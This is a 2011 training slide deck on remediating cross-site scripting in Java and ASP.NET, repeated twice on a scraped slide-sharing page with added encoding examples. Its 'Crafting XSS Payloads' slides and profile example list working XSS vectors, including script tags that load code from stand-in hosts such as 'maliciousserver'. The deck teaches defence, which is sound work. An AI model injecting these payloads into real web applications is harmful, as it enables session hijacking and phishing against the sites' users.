Cross-Site Scripting (XSS) Remediation
Guerilla Training Camp
Security BSides Austin

Dan Cornell




© Copyright 2011 Denim Group - All Rights Reserved
My Background
 • Dan Cornell, founder and CTO of Denim Group
 • Software developer by background (Java, .NET, etc.)
 • OWASP San Antonio, Global Membership Committee

 • Denim Group
         – Build software with special security, performance, reliability
           requirements
         – Help organizations deal with the risk associated with their software
                  • Code reviews and application assessments
                  • SDLC consulting
                  • Secure development training – instructor-led and eLearning

Agenda
 • What is Cross-Site Scripting (XSS)?

 • How Do You Remediate XSS Vulnerabilities?

 • Questions




Vulnerability: Cross-Site Scripting

 #2 in the OWASP Top 10

 If an attacker controls your browser – it is no longer your browser




Let's look at a simple application
 [Diagram: the Administrator's Web Browser talks to the Web Application's Administrative Pages; the Attacker's Web Browser talks to its User Pages; both sets of pages read and write the same Database.]
A standard user can update the name and email address on their profile:
    NormalGuy
    normalguy@normalmail.com

 An administrative user can retrieve this information, shown in a page:
   <input type="text" name="name" value="NormalGuy"><br>
   <input type="text" name="email" value="normalguy@normalmail.com">




With normal input

    <input type="text" name="name" value="NormalGuy"><br>
    <input type="text" name="email" value="normalguy@normalmail.com">



 [Diagram: the User's Web Browser submits NormalGuy / normalguy@normalmail.com through the User Pages into the Database; the Administrator's Web Browser retrieves it through the Administrative Pages and renders the input fields shown above.]
A malicious user can inject malicious scripts into their profile:
   MaliciousGuy
   "><script src="http://maliciousserver/rewritepage.js" />

 When the administrative user retrieves this information:
   <input type="text" name="name" value="MaliciousGuy"><br>
   <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js" />">




With malicious input
    <input type="text" name="name" value="MaliciousGuy"><br>
    <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js" />">




 [Diagram: the Attacker's Web Browser submits MaliciousGuy / "><script src="http://maliciousserver/rewritepage.js" /> through the User Pages into the Database; the Administrator's Web Browser retrieves it through the Administrative Pages, and the stored script is rendered into the administrator's page.]


What is Cross-Site Scripting?
 • Occurs when an application takes data from a user and sends it back
   to a web browser without validation or encoding
 • Victim's browser renders HTML and executes JavaScript chosen by
   the Attacker
 • Not a direct attack on the application – it is an attack on the users of
   the application
         – Exploitation can involve many scenarios including social engineering
 • Most common web application security issue
         – Based on MITRE statistics




Impact of Cross-Site Scripting
 What can an attacker accomplish with a malicious script?




Cross-Site Scripting Attacks
 • Attackers have several different means of getting their code to execute
   in another user's browser:

 • Reflected
 • Stored
 • DOM Based




Reflected Cross-Site Scripting
 • Attacker crafts a malicious link containing the payload
 • Attacker makes that link available for victims to click
 • Victim encounters malicious link and clicks
 • Web application reflects the payload back to the victim's browser
   where it is rendered and executed
 • Commonly found in
         – Login pages
         – Message pages




Reflected Cross-Site Scripting
 [Sequence diagram; participants: Attacker, User, Web Application, Malicious Web Server]
 • Attacker sends an e-mail to the user containing the link
 • The link makes a request to the web application
 • The response includes the malicious content
 • The malicious content sends authentication information to the attacker's resources,
   or redirects the user to the malicious website
Stored Cross-Site Scripting
 • Attacker posts payload to a database or other data store
 • Victim uses the same site and visits a page where the payload is sent
   back to the victim
 • The payload is rendered and executed in the browser
 • Commonly found in
         – Message boards
           (horizontal privilege escalation)
         – User management systems
           (vertical privilege escalation)




Stored Cross-Site Scripting
 [Sequence diagram; participants: Attacker, Web Application, User]
 • Attacker submits a field with malicious content to the web application
 • User requests the content in order to approve it
 • Web application replies with the stored malicious content
DOM-based Cross-Site Scripting
 • Attacker crafts a malicious link containing the payload
 • Attacker makes that link available for victims to click
 • Victim encounters malicious link and clicks
 • Client-side code parses user-supplied data to make decisions
 • Things to look for
         – document.URL
         – document.URLUnencoded
         – document.location (and its other properties)
         – document.referrer
         – window.location (and its other properties)




Crafting XSS Payloads
 • Most basic, if payload is echoed directly into open HTML
         – <script>alert('hi');</script>
 • Sometimes you may have to deal with application HTML
         – <input name='uname' value='<%= Request["uname"] %>' />
         – uname parameter must:
                   • Close out the value attribute: '>
                   • Then include the payload: <script>alert('hi');</script>
                   • Then clean up before the application HTML starts again: <'
                   • Full payload: '><script>alert('hi');</script><'




Crafting XSS Payloads
 Script with the 'src' attribute
 <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT>
 An attacker is likely to use the 'src' attribute if the script requires more
   space than the application accommodates.

 Image
 <IMG SRC="javascript:alert('XSS');">


 Body
 <BODY BACKGROUND="javascript:alert('XSS')">




Crafting XSS Payloads
 Input
 <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


 Iframe
 <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 In addition, the iframe can point to a malicious page on a remote host.

 Table
 <TABLE BACKGROUND="javascript:alert('XSS')">


 Div
 <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">



Impact
 • Attacker can render HTML and execute script in the victim's browser,
   resulting in:
         – Session hijacking (adding JavaScript that forwards cookies to an attacker)
         – Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page)
         – Defacing web site (adding "This company is terrible!!!" to a page)
         – Inserting hostile content (adding malicious ActiveX controls to a page)
         – Phishing attacks (adding login FORM posts to 3rd party sites)
         – Takeover of the user's browser (adding JavaScript code to redirect the user)




Mitigation
 • Positively validate inputs
         – Length, type, syntax, business rules
 • Encode application outputs
         – HTML or XML
         – < becomes &lt; and so on
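 The profile scenario from the earlier slides with this encoding rule applied, as an added example in JavaScript (not code from the deck, and not ESAPI's implementation): encodeForHTML, encodeForHTMLAttribute, renderProfileUnsafe, renderProfileSafe and hasUnexpectedTags are names introduced here, and the two sample profiles are constructed to match the deck's NormalGuy / MaliciousGuy data.

```javascript
// Added example (not from the slides): context-aware output encoding for the
// administrative profile page the deck describes, so that a stored name or
// email address cannot break out of the <input value="..."> attribute it is
// rendered into.

// Encoding for HTML element content ("< becomes &lt; and so on"): the
// characters that can open a tag, entity, attribute or closing tag in body
// context are replaced with entities.
function encodeForHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;')
    .replace(/\//g, '&#x2F;');
}

// Encoding for a quoted HTML attribute value: everything except
// alphanumerics and a small immune set (, . - _) becomes a hex entity, so no
// input character can terminate the surrounding quote. Same approach as
// ESAPI's encodeForHTMLAttribute(); reimplemented here, not ESAPI's code.
function encodeForHTMLAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9,.\-_]/g, (ch) => {
    const hex = ch.charCodeAt(0).toString(16).toUpperCase();
    return '&#x' + hex + ';';
  });
}

// The deck's administrative page rendered the way a raw <%= %> expression
// renders it: stored values are concatenated straight into the markup.
function renderProfileUnsafe(profile) {
  return '<input type="text" name="name" value="' + profile.name + '"><br>' +
         '<input type="text" name="email" value="' + profile.email + '">';
}

// The remediated page: every stored value is encoded for the attribute
// context it is placed in.
function renderProfileSafe(profile) {
  return '<input type="text" name="name" value="' +
         encodeForHTMLAttribute(profile.name) + '"><br>' +
         '<input type="text" name="email" value="' +
         encodeForHTMLAttribute(profile.email) + '">';
}

// Check usable in a unit test: the template itself emits only <input> and
// <br> tags, so any other tag in the rendered output came from user data.
function hasUnexpectedTags(html) {
  const tags = html.match(/<[a-zA-Z]+/g) || [];
  return tags.some((t) => !/^<(input|br)$/i.test(t));
}

// Constructed sample profiles matching the deck's scenario.
const normalProfile = { name: 'NormalGuy', email: 'normalguy@normalmail.com' };
const maliciousProfile = {
  name: 'MaliciousGuy',
  email: '"><script src="http://maliciousserver/rewritepage.js" />',
};

console.log('unsafe:', renderProfileUnsafe(maliciousProfile));
console.log('safe:  ', renderProfileSafe(maliciousProfile));
console.log('leaks a tag?', hasUnexpectedTags(renderProfileUnsafe(maliciousProfile)),
            hasUnexpectedTags(renderProfileSafe(maliciousProfile)));
```

The browser decodes `normalguy&#x40;normalmail.com` back to the original address when it reads the attribute, so legitimate data is displayed unchanged while the stored payload stays inert text.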




Java-specific Safeguards
 • Avoid using <%= %> because that does not encode outputs
 • Escape special HTML characters
         – < > ' " / & and so on…
 • Use URLEncoder class to encode characters being placed in a URL
 • Use Struts output mechanisms such as <bean:write …>
 • Use the JSTL escapeXml="true" attribute in <c:out …>

 • Use ESAPI Encoders




.NET-specific Safeguards
 • .NET has built-in blacklist validation against many known XSS attacks
         – This is good, but not ideal
         – This can be turned off with ValidateRequest="false" in the Page tag (BAD!)
 • Validation framework offers many protection options
         – RegExValidator and others
 • Avoid using <%= %> because that does not encode outputs
         – Look at <%: %> syntax in ASP.NET 4
         – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html-encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx
 • Better: Use HttpUtility.HtmlEncode() to encode user-supplied
   data that is reflected back to users
 • Best: Microsoft Web Protection Library (WPL)
         – http://wpl.codeplex.com/

Cross-Site Scripting Recap
 • Cross-Site Scripting (XSS) occurs when an application takes data
   from a user and sends it back to a web browser without validation or
   encoding
 • There are three main varieties:
         – Stored
         – Reflected
         – DOM-based
 • To guard against:
         – Positively validate inputs
         – Escape user-supplied data sent back to the browser




OWASP ESAPI
 • Sites:
         – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
         – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE


 • Good: Provides very robust set of encoder functions
 • Less good:
         – Has a number of dependencies (~29) (currently – work on modularity is in progress)
         – Implementations are of varying maturity. Most useful for Java.




OWASP ESAPI (Java)
 • To Use:
         – Follow the installation guide
         – Must create a folder (.esapi) to store your configuration and preferences
 • Get access to library:
         – Add all the support jars (31) to your project
         – Remove repeated jars
         – Add esapi-2.0_rc10.jar to your project
         <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %>

 • Make calls to encode tainted data:
         – ESAPI.encoder().encodeForHTML()
         – ESAPI.encoder().encodeForHTMLAttribute()




ASP.NET Request Validation
 • ASP.NET provides some blacklist-based input validation to try and
   guard against HTML injection and cross-site scripting (XSS) attacks

 • This is turned on by default (yeah!)
 • Many applications disable it (boo!)
         – Blocked a valid request
         – Made trouble with AJAX
         – And so on




ASP.NET Request Validation
 • How to configure or check if it is enabled?

 • This is turned on by default

 • In web.config:
         <configuration>
                  <system.web>
                           <pages validateRequest="true|false" />
                  </system.web>
         </configuration>


 • Per-page:
          <%@ Page … ValidateRequest="true|false" %>

Microsoft Web Protection Library
 • Main site:
         – http://wpl.codeplex.com/
 • To use:
         – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll)
                   • Found in C:\Program Files (x86)\Microsoft Information Security\AntiXSS Library v4.0
         – Get access to library:
                  • In code:
                          – using Microsoft.Security.Application;
                  • In ASPX page:
                          – <%@ Import Namespace="Microsoft.Security.Application" %>
         – Make call to encode tainted data:
                  • AntiXss.HtmlEncode()
                  • AntiXss.HtmlAttributeEncode()
                  • And so on…



Exercise: Fixing XSS Vulnerabilities
 • Java
         – Reflected XSS
         – Stored XSS
 • ASP.NET
         – Reflected XSS
         – Stored XSS




But Your ASP.NET Examples Cheated!
 • This is true: ASP.NET provides some XSS protection via the
   ValidateRequest functionality

 • However:
         – This can be (and is often) turned off on a per-page or site-wide basis
         – It has been defeated in the past and will be defeated again in the future
                   • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/bypassing-dot-NET-ValidateRequest.pdf
                   • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf


 • If you want your code to be “Rugged” then you need to actually guard
   against cross-site scripting vulnerabilities in your code


Resources
 • OWASP ESAPI
         – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
 • Microsoft Web Protection Library
         – http://wpl.codeplex.com/


 • Denim Group Remediation Resource Center
         – www.denimgroup.com/remediation




Questions?
 Dan Cornell
 dan@denimgroup.com
 Twitter: @danielcornell

 www.denimgroup.com
 (210) 572-4400





Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 

XSS Remediation

1. Cross-Site Scripting (XSS) Remediation
   Guerilla Training Camp
   Security BSides Austin
   Dan Cornell
   © Copyright 2011 Denim Group - All Rights Reserved

2. My Background
   • Dan Cornell, founder and CTO of Denim Group
   • Software developer by background (Java, .NET, etc)
   • OWASP San Antonio, Global Membership Committee
   • Denim Group
     – Build software with special security, performance, reliability requirements
     – Help organizations deal with the risk associated with their software
       • Code reviews and application assessments
       • SDLC consulting
       • Secure development training – instructor-led and eLearning

3. Agenda
   • What is Cross-Site Scripting (XSS)?
   • How Do You Remediate XSS Vulnerabilities?
   • Questions

4. Vulnerability: Cross-Site Scripting
   #2 in the OWASP Top 10
   If an attacker controls your browser – it is no longer your browser

5. Let's look at a simple application
   [Diagram: the Administrator's web browser reaches the Administrative Pages and the Attacker's web browser reaches the User Pages of the Web Application; both sets of pages share one Database]

6. A standard user can update the name and email address on their profile:
     NormalGuy
     normalguy@normalmail.com
   An administrative user can retrieve this information, shown in a page:
     <input type="text" name="name" value="NormalGuy"><br>
     <input type="text" name="email" value="normalguy@normalmail.com">

7. With normal input
     <input type="text" name="name" value="NormalGuy"><br>
     <input type="text" name="email" value="normalguy@normalmail.com">
   [Diagram: the User submits NormalGuy / normalguy@normalmail.com through the User Pages into the Database; the Administrator's browser receives it back through the Administrative Pages]

8. A malicious user can inject malicious scripts into their profile:
     MaliciousGuy
     "><script src="http://maliciousserver/rewritepage.js" />
   When the administrative user retrieves this information:
     <input type="text" name="name" value="NormalGuy"><br>
     <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js" />">

9. With malicious input
     <input type="text" name="name" value="MaliciousGuy"><br>
     <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js" />">
   [Diagram: the Attacker submits MaliciousGuy / "><script src="http://maliciousserver/rewritepage.js" /> through the User Pages into the Database; the Administrator's browser receives it back through the Administrative Pages]
10. What is Cross-Site Scripting?
   • Occurs when an application takes data from a user and sends it back to a web browser without validation or encoding
   • Victim's browser renders HTML and executes JavaScript chosen by the attacker
   • Not a direct attack on the application – it is an attack on the users of the application
     – Exploitation can involve many scenarios, including social engineering
   • Most common web application security issue
     – Based on MITRE statistics

11. Impact of Cross-Site Scripting
   What can an attacker accomplish with a malicious script?

12. Cross-Site Scripting Attacks
   • Attackers may have different means of getting their code to execute in another user's browser
     • Reflected
     • Stored
     • DOM Based

13. Reflected Cross-Site Scripting
   • Attacker crafts a malicious link containing the payload
   • Attacker makes that link available for victims to click
   • Victim encounters the malicious link and clicks
   • Web application reflects the payload back to the victim's browser, where it is rendered and executed
   • Commonly found in
     – Login pages
     – Message pages

14. Reflected Cross-Site Scripting
   [Sequence diagram: Attacker, User, Web Application, Malicious Web Server]
     1. Attacker sends e-mail to user with link
     2. Link makes request to website
     3. Response includes malicious content
     4. Malicious content sends authentication information to attacker's resources, or malicious content redirects user to malicious website

15. Stored Cross-Site Scripting
   • Attacker posts payload to a database or other data store
   • Victim uses the same site and visits a page where the payload is sent back to the victim
   • The payload is rendered and executed in the browser
   • Commonly found in
     – Message boards (horizontal privilege escalation)
     – User management systems (vertical privilege escalation)

16. Stored Cross-Site Scripting
   [Sequence diagram: Attacker, Web Application, User]
     1. Attacker submits field with malicious content
     2. User requests content to approve
     3. Reply containing malicious content

17. DOM-based Cross-Site Scripting
   • Attacker crafts a malicious link containing the payload
   • Attacker makes that link available for victims to click
   • Victim encounters the malicious link and clicks
   • Client-side code parses user-supplied data to make decisions
   • Things to look for
     – document.URL
     – document.URLUnencoded
     – document.location (and its other properties)
     – document.referrer
     – window.location (and its other properties)
18. Crafting XSS Payloads
   • Most basic, if payload is echoed directly into open HTML
     – <script>alert('hi');</script>
   • Sometimes you may have to deal with application HTML
     – <input name='uname' value='<%= Request["uname"] %>' />
     – uname parameter must:
       • Close out the value attribute: '>
       • Then include the payload: <script>alert('hi');</script>
       • Then clean up before the application HTML starts again: <'
       • Full payload: '><script>alert('hi');</script><'

19. Crafting XSS Payloads
   Script with the 'src' attribute
     <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT>
   An attacker is likely to use the 'src' attribute if the script requires more space than the application accommodates.
   Image
     <IMG SRC="javascript:alert('XSS');">
   Body
     <BODY BACKGROUND="javascript:alert('XSS')">

20. Crafting XSS Payloads
   Input
     <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
   Iframe
     <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
   In addition, the iframe can point to a malicious page on a remote host.
   Table
     <TABLE BACKGROUND="javascript:alert('XSS')">
   Div
     <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

21. Impact
   • Attacker can render HTML and execute script in the victim's browser, resulting in:
     – Session hijacking (adding JavaScript that forwards cookies to an attacker)
     – Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page)
     – Defacing web site (adding "This company is terrible!!!" to a page)
     – Inserting hostile content (adding malicious ActiveX controls to a page)
     – Phishing attacks (adding login FORM posts to 3rd party sites)
     – Takeover of the user's browser (adding JavaScript code to redirect the user)
22. Mitigation
   • Positively validate inputs
     – Length, type, syntax, business rules
   • Encode application outputs
     – HTML or XML
     – < becomes &lt; and so on

23. Java-specific Safeguards
   • Avoid using <%= %> because that does not encode outputs
   • Escape special HTML characters
     – < > ' " / & and so on…
   • Use the URLEncoder class to encode characters being placed in a URL
   • Use Struts output mechanisms such as <bean:write …>
   • Use the JSTL escapeXml="true" attribute in <c:out …>
   • Use ESAPI Encoders

24. .NET-specific Safeguards
   • .NET has built-in blacklist validation against many known XSS attacks
     – This is good, but not ideal
     – This can be turned off with ValidateRequest="false" in the Page tag (BAD!)
   • Validation framework offers many protection options
     – RegExValidator and others
   • Avoid using <%= %> because that does not encode outputs
     – Look at the <%: %> syntax in ASP.NET 4
     – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html-encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx
   • Better: Use HttpUtility.HtmlEncode() to encode user-supplied data that is reflected back to users
   • Best: Microsoft Web Protection Library (WPL)
     – http://wpl.codeplex.com/

25. Cross-Site Scripting Recap
   • Cross-Site Scripting (XSS) occurs when an application takes data from a user and sends it back to a web browser without validation or encoding
   • There are three main varieties:
     – Stored
     – Reflected
     – DOM-based
   • To guard against it:
     – Positively validate inputs
     – Escape user-supplied data sent back to the browser
26. OWASP ESAPI
   • Sites:
     – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
     – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE
   • Good: Provides a very robust set of encoder functions
   • Less good:
     – Has a number of dependencies (~29) (currently – work on modularity is in progress)
     – Implementations are of varying maturity. Most useful for Java.

27. OWASP ESAPI (Java)
   • To Use:
     – Follow the installation guide
     – Must create a folder (.esapi) to store your configuration and preferences
   • Get access to library:
     – Add all the support jars (31) to your project
     – Remove repeated jars
     – Add esapi-2.0_rc10.jar to your project
       <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %>
   • Make calls to encode tainted data:
     – ESAPI.encoder().encodeForHTML()
     – ESAPI.encoder().encodeForHTMLAttribute()
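Worked example for the two-step mitigation on slides 22 and 23 (positive validation, then output encoding) and the ESAPI calls on slide 27, applied to the profile page from slides 6-9. This is an added example, not code from the deck or from ESAPI: the `ProfileRenderer` class, its method names and the two validation patterns are assumptions made here, and the hand-written attribute encoder stands in for `ESAPI.encoder().encodeForHTMLAttribute()` so the class runs without any jars.

```java
import java.util.regex.Pattern;

/** Hypothetical helper for the admin profile page on slides 6-9 (not from the deck). */
public class ProfileRenderer {

    // Positive input validation (slide 22): length, type and syntax rules per field.
    // These patterns are constructed for the demo; pick rules that match your own data.
    private static final Pattern NAME =
        Pattern.compile("^[A-Za-z0-9 .'-]{1,40}$");
    private static final Pattern EMAIL =
        Pattern.compile("^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,190}\\.[A-Za-z]{2,}$");

    static boolean isValidName(String s)  { return s != null && NAME.matcher(s).matches(); }
    static boolean isValidEmail(String s) { return s != null && EMAIL.matcher(s).matches(); }

    // Output encoding (slide 23): escape every character that can close the attribute
    // or open a tag. ESAPI.encoder().encodeForHTMLAttribute() (slide 27) does the same
    // job; this hand-written version keeps the example dependency-free.
    static String encodeForHtmlAttribute(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // The deck's vulnerable rendering: stored data is concatenated into the attribute as-is.
    static String renderVulnerable(String name, String email) {
        return "<input type=\"text\" name=\"name\" value=\"" + name + "\"><br>\n"
             + "<input type=\"text\" name=\"email\" value=\"" + email + "\">";
    }

    // Remediated: same markup, every untrusted value attribute-encoded before concatenation.
    static String renderEncoded(String name, String email) {
        return renderVulnerable(encodeForHtmlAttribute(name), encodeForHtmlAttribute(email));
    }

    public static void main(String[] args) {
        // Constructed input: the MaliciousGuy profile from slide 8.
        String name  = "MaliciousGuy";
        String email = "\"><script src=\"http://maliciousserver/rewritepage.js\" />";
        // Validation rejects the payload at the input boundary...
        System.out.println("name valid:  " + isValidName(name));
        System.out.println("email valid: " + isValidEmail(email));
        // ...and encoding keeps the page safe even for data already sitting in the database.
        System.out.println("-- vulnerable --\n" + renderVulnerable(name, email));
        System.out.println("-- encoded --\n"    + renderEncoded(name, email));
    }
}
```

In the encoded output the stored `"` and `>` become `&quot;` and `&gt;`, so the browser keeps the whole payload inside the `value` attribute instead of starting a `<script>` tag.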
28. ASP.NET Request Validation
   • ASP.NET provides some blacklist-based input validation to try and guard against HTML injection and cross-site scripting (XSS) attacks
   • This is turned on by default (yeah!)
   • Many applications disable it (boo!)
     – Blocked a valid request
     – Made trouble with AJAX
     – And so on

29. ASP.NET Request Validation
   • How to configure or check if it is enabled?
   • This is turned on by default
   • In web.config:
       <configuration>
         <system.web>
           <pages validateRequest="true|false" />
         </system.web>
       </configuration>
   • Per-page:
       <%@ Page … ValidateRequest="true|false" %>

30. Microsoft Web Protection Library
   • Main site:
     – http://wpl.codeplex.com/
   • To use:
     – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll)
       • Found in C:\Program Files (x86)\Microsoft Information Security\AntiXSS Library v4.0
     – Get access to library:
       • In code:
         – using Microsoft.Security.Application;
       • In ASPX page:
         – <%@ Import Namespace="Microsoft.Security.Application" %>
     – Make calls to encode tainted data:
       • AntiXss.HtmlEncode()
       • AntiXss.HtmlAttributeEncode()
       • And so on…
31. Exercise: Fixing XSS Vulnerabilities
   • Java
     – Reflected XSS
     – Stored XSS
   • ASP.NET
     – Reflected XSS
     – Stored XSS

32. But Your ASP.NET Examples Cheated!
   • This is true: ASP.NET provides some XSS protection via the ValidateRequest functionality
   • However:
     – This can be (and often is) turned off on a per-page or site-wide basis
     – It has been defeated in the past and will be defeated again in the future
       • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/bypassing-dot-NET-ValidateRequest.pdf
       • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
   • If you want your code to be "Rugged" then you need to actually guard against cross-site scripting vulnerabilities in your code

33. Resources
   • OWASP ESAPI
     – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
   • Microsoft Web Protection Library
     – http://wpl.codeplex.com/
   • Denim Group Remediation Resource Center
     – www.denimgroup.com/remediation

34. Questions?
   Dan Cornell
   dan@denimgroup.com
   Twitter: @danielcornell
   www.denimgroup.com
   (210) 572-4400